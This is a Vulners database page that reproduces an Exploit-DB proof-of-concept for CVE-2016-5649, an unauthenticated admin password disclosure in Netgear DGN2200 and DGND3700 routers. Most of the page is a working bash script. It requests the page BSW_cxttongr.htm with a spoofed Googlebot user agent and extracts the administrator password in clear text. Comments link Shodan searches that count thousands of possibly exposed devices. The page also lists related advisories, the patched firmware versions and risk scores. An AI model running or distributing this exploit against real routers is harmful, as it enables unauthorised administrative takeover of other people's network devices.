Vulners
Lucene search
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
🗓️ 30 Apr 2019 00:00:00Reported by Social Engineering NeoType 
exploitdb🔗 www.exploit-db.com👁 51 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Netgear DGN2200 / DGND3700 / WNDR4500 Information Disclosure Vulnerability | 4 Jan 201700:00 | – | zdt |
| Netgear DGN2200 / DGND3700 - Admin Password Disclosure Vulnerability | 1 May 201900:00 | – | zdt |
 | Netgear DGN2200 Information Disclosure Vulnerability | 26 Jul 201800:00 | – | cnvd |
 | CVE-2016-5649 | 24 Jul 201815:00 | – | cve |
 | CVE-2016-5649 Netgear DGN2200 and DGND3700 disclose the administrator password | 24 Jul 201815:00 | – | cvelist |
 | Netgear DGN2200 DGND3700 - Admin Password Disclosure | 30 Apr 201900:00 | – | exploitpack |
 | NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure | 3 Jun 202606:04 | – | nuclei |
 | CVE-2016-5649 | 24 Jul 201815:29 | – | nvd |
 | Netgear DGN2200 / DGND3700 Password Disclosure Vulnerability - Active Check | 6 Jan 201700:00 | – | openvas |
| Netgear DGN2200 / DGND3700 Admin Password Disclosure - Active Check | 25 Jul 201800:00 | – | openvas |
10
#/bin/bash
# PoC based on CVE-2016-5649 created by Social Engineering Neo.
#
# Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs
#
# https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices.
# https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices.
#
# A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication.
# When the request is processed, it exposes the administrator password in clear text before getting redirected to 'absw_vfysucc.cgia'.
# An attacker can use this password to gain administrator access of the targeted routers web interface.
#
# Netgear has released firmware version 1.0.0.52 for DGN2200 & 1.0.0.28 for DGND3700 to address this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' $target:$port/BSW_cxttongr.htm)
pass=$(echo $grab | awk '{print $218}' | tail -c +2 | head -c -3)
if [ "$pass" == '' ] || [ "$pass" == '/html' ] ; then
echo Invalid Response, Target May Not be Vulnerable.
else
echo The Password for: $target is: $pass
fi
else
echo "Incorrect Port."
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2019 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 25
CVSS 39.8
EPSS0.59245